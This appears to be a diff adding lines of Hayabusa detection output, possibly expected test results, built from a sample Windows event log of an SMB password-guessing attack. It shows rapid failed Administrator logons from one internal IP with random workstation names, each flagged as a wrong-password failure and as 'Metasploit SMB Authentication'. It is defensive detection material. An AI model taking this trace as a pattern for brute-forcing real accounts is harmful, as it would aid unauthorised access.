+2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L8rkZ7iBMam5o8VJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n39Zox0PFeNirzyT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3u3YUCKxEo5pnKJX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wen3pHM88kSRkHNf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dGDHJ4KMm2zEMV0b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lKZAB1nfXPYSLxsE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tYkOsX0XDpkdvp01  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r9y7HjOeGPcrdj1c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RLwh8Lg3nvbm8Q2p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QoMkBcp8ouIgpX4m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2UnrDiOAOec5DQGQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UxJGLShj5EDKLSDZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iWhaz8W0VLQdXKWN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 82YDxSIBnCAqdK4c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 795b7XqsxokIGJyM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1BmnyTsmP2XqMzf1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NB3xsYe3RcPXhDib  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yxN9i8exdO2h4oa7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vjcQaeuo4f8wFXhv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zCzr77BhliB4KKeb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z558005RepKaO1zZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9HFzW25mJz4JLkv7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y7J8m97GQWt2cbSs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XJrVwcpABBaZ8cyY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VcDw3I4BaFLdIeCZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: egEpV9aAuCFjwx2I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: th0ZLWF4YeOaNnkK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ahrOLfdy6DCQ9SfO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xiooSdP5eib8PUE3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s6nQ2jp9IGYnGeyD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ejMtyR5QNdJFhw1W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e50kO0aVhfw5np5T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 176XyLw6IhEI6NuD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KXCzCSSFvpbWNJFd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XhHRuZYlH8hekaKc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZGIUBFRMQ3OBbOA0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R7CTT5g1w58eRRlS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JmVccmad66uOK9ox  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t1jlT6kEcs14dcNZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rBty5jOGkkZSZEyD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0Ci7YUsO5MtFkDSW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 12JToliq9mmAuMTQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lw9AgAvBGWoXBlim  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ReGDyvRpGknAKqqB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6mdUn8na4asRfpJP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b7Wm5p4HnNCbkyh2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
